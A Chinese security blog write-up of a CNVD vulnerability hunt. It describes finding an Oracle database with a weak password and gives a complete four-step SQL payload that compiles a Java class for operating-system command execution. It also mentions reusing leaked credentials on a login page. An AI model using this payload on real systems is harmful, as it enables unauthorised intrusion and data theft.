记一次CNVD事件漏洞挖掘思路

admin 2024年12月18日13:01:48评论43 views字数 1443阅读4分48秒阅读模式

免责声明:

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责

一、信息收集

信息收集的目的是了解目标的基本情况,包括网络拓扑结构、系统架构、运行的服务和应用程序、已知漏洞、潜在安全风险等。通过信息收集,渗透测试人员可以获得对目标的深入了解,从而确定可能的攻击矢量和漏洞利用路径,为后续的渗透测试工作做准备。

通过鹰图平台进行查询:

icp.name=xxx

该语法是搜索ICP备案单位名中含有“xxx”的资产

记一次CNVD事件漏洞挖掘思路

很快找到了一个数据库存在弱口令

通过工具 我们对进行漏洞利用

记一次CNVD事件漏洞挖掘思路

上述工具Rce命令执行并不稳定,会存在报错等情况。

这里还有一种手法通过手工Payload提权,到创建函数,在Navicat上稳定命令执行:

1、创建java source:

select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"n";myReader.close();return str;} catch (Exception e){return e.toString();}}}'';commit;end;') from dual;

2、创建函数:

select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''LinxUtil.runCMD(java.lang.String) return String''''; '';commit;end;') from dual;

3、可以通过查询OBJECT_ID来判断函数是否创建成功:

select OBJECT_ID from all_objects where object_name ='LINXRUNCMD';

4、最后一步执行命令:

select LinxRUNCMD('/sbin/ifconfig') from dual;

记一次CNVD事件漏洞挖掘思路

记一次CNVD事件漏洞挖掘思路

从上述数据库发现的其他数据库配置,连接,数据情况

记一次CNVD事件漏洞挖掘思路

上述文件导致测试账密泄露,下面是利用文件里的账密撞库成功

http://xxxxxx/login

记一次CNVD事件漏洞挖掘思路

记一次CNVD事件漏洞挖掘思路

记一次CNVD事件漏洞挖掘思路

原文始发于微信公众号(奉天安全团队):记一次CNVD事件漏洞挖掘思路

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月18日13:01:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次CNVD事件漏洞挖掘思路https://cn-sec.com/archives/3522878.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息